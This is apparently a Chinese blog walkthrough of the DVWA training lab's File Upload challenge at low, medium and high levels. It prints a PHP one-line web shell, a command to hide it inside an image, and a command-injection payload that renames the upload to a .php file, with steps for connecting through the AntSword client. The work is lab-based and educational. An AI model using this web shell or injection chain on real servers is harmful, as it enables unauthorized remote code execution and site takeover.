【dvwa靶场:File Upload系列】File Upload低-中-高级别,通关啦

目录

一、low级别,直接上传木马文件

1.1、准备一个木马文件

1.2、直接上传木马文件

1.3、访问木马链接

1.4、连接蚁剑

二、medium级别:抓包文件缀名

2.1、准备一个木马文件,修改后缀名为图片的后缀名

2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行

2.3、访问木马文件链接

2.4、连接蚁剑

三、high级别:木马图片,命令执行修改为木马文件

3.1、准备一个真实小图片,命名自定义,以下是示例

3.2、准备一个木马文件

3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令

[3.4、上传文件 ,成功后复制路径](#3.4、上传文件 ,成功后复制路径)

[3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件](#3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件)

​3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径

3.7、蚁剑连接:木马链接和木马密码


一、low级别,直接上传木马文件

1.1、准备一个木马文件

1.2、直接上传木马文件

1.3、访问木马链接

1.4、连接蚁剑

二、medium级别:抓包文件缀名

2.1、准备一个木马文件,修改后缀名为图片的后缀名

2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行

2.3、访问木马文件链接

2.4、连接蚁剑

三、high级别:木马图片,命令执行修改为木马文件

3.1、准备一个真实小图片,命名自定义,以下是示例

3.2、准备一个木马文件

复制代码
<?php @eval($_POST['pass']);?>

3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令

复制代码
copy 真实图片.后缀名/b+木马文件.后缀名 木马图片.真实图片后缀名

3.4、上传文件 ,成功后复制路径

3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件

复制代码
127.0.0.1|move ../../hackable/uploads/你的木马图片 ../../hackable/uploads/修改后的木马文件

例如我的:127.0.0.1|move ../../hackable/uploads/mua.jpg ../../hackable/uploads/mua.php

3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径

http://127.0.0.1/dvwa/vulnerabilities/exec/../../hackable/uploads/mua.php直接回车,变成下方的木马文件链接

http://127.0.0.1/dvwa/hackable/uploads/mua.php

3.7、蚁剑连接:木马链接和木马密码

相关推荐
Bruce_Liuxiaowei19 分钟前
跨站脚本攻击(XSS)高级绕过技术与防御方案
前端·网络安全·xss
人衣aoa13 小时前
PG靶机 - Pelican
web安全·网络安全·渗透测试·内网渗透
lingggggaaaa13 小时前
小迪安全v2023学习笔记(六十一讲)—— 持续更新中
笔记·学习·安全·web安全·网络安全·反序列化
运维行者_16 小时前
使用Applications Manager进行 Apache Solr 监控
运维·网络·数据库·网络安全·云计算·apache·solr
挨踢攻城20 小时前
IT资讯 | VMware ESXi高危漏洞影响国内服务器
安全·web安全·网络安全·vmware·虚拟化技术·厦门微思网络·vmware esxi高危漏洞
菜根Sec2 天前
Sqli-labs靶场搭建及报错处理
web安全·网络安全·渗透测试·sql注入·网络安全靶场
浩浩测试一下2 天前
02高级语言逻辑结构到汇编语言之逻辑结构转换 if (...) {...} else {...} 结构
汇编·数据结构·数据库·redis·安全·网络安全·缓存
啥都想学点3 天前
Windows基础概略——第一阶段
网络安全
star010-3 天前
PeiQi网络安全知识文库PeiQi-WIKI-Book保姆式搭建部署教程
安全·web安全·网络安全
Whoami!4 天前
2-1〔O҉S҉C҉P҉ ◈ 研记〕❘ 漏洞扫描▸理论基础与NSE脚本
网络安全·信息安全·漏洞扫描·oscp